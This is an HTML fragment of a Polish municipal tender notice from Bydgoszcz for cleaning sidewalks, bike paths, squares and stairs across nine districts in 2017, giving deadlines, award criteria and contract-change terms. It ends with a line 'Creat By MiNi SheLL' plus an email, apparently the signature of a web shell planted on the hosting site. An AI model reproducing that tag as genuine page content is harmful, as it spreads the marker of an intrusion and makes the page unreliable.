              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana umowy w formie pisemnego aneksu może nastąpić na zasadach określonych w art. 144 uPzp, w tym w przypadku:
1) zmiany powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
2) zmiany warunków gospodarczych, w tym: zmiany stawek podatku od towaru i usług (VAT),
3) zaistnienia obiektywnych, niezależnych od stron przeszkód w realizacji umowy zawartej w wyniku udzielonego zamówienia, w szczególności zmiany zakresu lub metody wykonania przedmiotu umowy, 
4) okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, 
5) przesłanek wymienionych we wzorze umowy. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/03/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Składanie ofert: w siedzibie Wydziału Zamówień Publicznych Urzędu Miasta Bydgoszczy przy ul.  Grudziądzkiej 9-15, bud. B, II piętro, pok. nr 208 do dnia  9.03.2017 r. do godz. 11.00.
2. Otwarcie ofert nastąpi w dniu 9.03.2017 r. o godz. 11.15 w siedzibie Wydziału Zamówień Publicznych Urzędu Miasta Bydgoszczy przy ul. Grudziądzkiej 9-15, bud. B, II piętro, pok. nr 205.
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>rejon I<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>rejon II<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>rejon III<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>rejon IV<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>rejon V<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>rejon VI<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>rejon VII<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>rejon VIII<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>rejon IX<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90511100-2, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com